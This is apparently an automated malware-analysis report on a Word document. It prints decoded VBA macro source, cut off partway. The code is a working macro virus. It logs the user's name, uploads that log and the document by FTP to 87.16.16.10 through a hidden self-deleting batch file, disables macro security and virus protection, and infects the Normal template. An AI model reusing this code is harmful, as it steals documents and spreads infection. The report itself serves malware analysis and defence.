MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Word document containing VBA macros. Heuristics indicate the presence of VBA macros and a critical finding of a Shell() call within the VBA code, suggesting arbitrary code execution. The ClamAV detection of 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' further confirms its malicious nature. The VBA script attempts to create a log file at 'C:\Log' and appears to be part of a downloader or dropper mechanism.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4652 bytes |
SHA-256: 29a64c18c3a23d6d5914a8126a72d1443309ee1fbdc7d558496eebb6be3f0919 |
|||
|
Detection
ClamAV:
Win.Trojan.wmvg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const EXELoc = "Template"
'Ver=2.02
Private Sub Document_Close()
On Error Resume Next
Const InfectedMark = "本产品为良性"
Const Ver = "2.01"
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
Dim BegSlash, EndSlash, Loc As Long
Dim FileDosPath As String
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.codemodule.Find(InfectedMark, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.codemodule.Find(InfectedMark, 1, 1, 10000, 10000)
If (EXELoc <> "Template") Or Not (DocumentInfected) Then
LogData = Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & _
"' " & Application.UserName & _
"' " & UserAddress & "' " & ThisDocument.Name
For i = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
LogFile = "C:\Log" & LogFile
Open LogFile For Output As #1
Print #1, LogData
Close #1
BegSlash = 1
EndSlash = 1
FileDosPath = ActiveDocument.Path + "\"
Do While EndSlash > 0
BegSlash = InStr(BegSlash, FileDosPath, "\")
EndSlash = InStr(BegSlash + 1, FileDosPath, "\")
FileDosPath = Mid(FileDosPath, 1, BegSlash) + """" + Mid(FileDosPath, BegSlash + 1, EndSlash - BegSlash - 1) + _
"""" + Mid(FileDosPath, EndSlash)
BegSlash = EndSlash + 2
Loop
Open "c:\Log" For Output As #1
Print #1, "o 87.16.16.10"
Print #1, "user centre centre"
Print #1, "cd /usr/news"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "binary"
Print #1, "put " & FileDosPath & ActiveDocument.Name
Print #1, "del " & LogFile
Print #1, "del c:\Log "
Print #1, "quit"
Close #1
Open "c:\DelBat.bat" For Output As #1
Print #1, "call ftp.exe -n -s:c:\Log"
Print #1, "del " & LogFile
Print #1, "del c:\Log"
Print #1, "del c:\DelBat.bat"
Close #1
Shell "command.com /c c:\DelBat.bat", vbHide
End If
If DocumentInfected Then
If IsNumeric(Mid(ad.codemodule.Lines(2, 1), 6)) Then
DocumentInfected = (Val(Mid(ad.codemodule.Lines(2, 1), 6)) >= Ver)
Else
DocumentInfected = False
End If
End If
If NormalTemplateInfected Then
If IsNumeric(Mid(nt.codemodule.Lines(2, 1), 6)) Then
NormalTemplateInfected = (Val(Mid(nt.codemodule.Lines(2, 1), 6)) >= Ver)
End If
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("工具").Controls("宏").Enabled = False
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.SavePropertiesPrompt = False
End If
If (DocumentInfected = False Or NormalTemplateInfected = False) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = "const EXELoc=" + """" + "Template" + """" + Chr(13)
OurCode = OurCode + ad.codemodule.Lines(2, ad.codemodule.CountOfLines - 1)
nt.codemodule.DeleteLines 1, nt.codemodule.CountOfLines
nt.codemodule.AddFromString OurCode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
If NormalTe
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.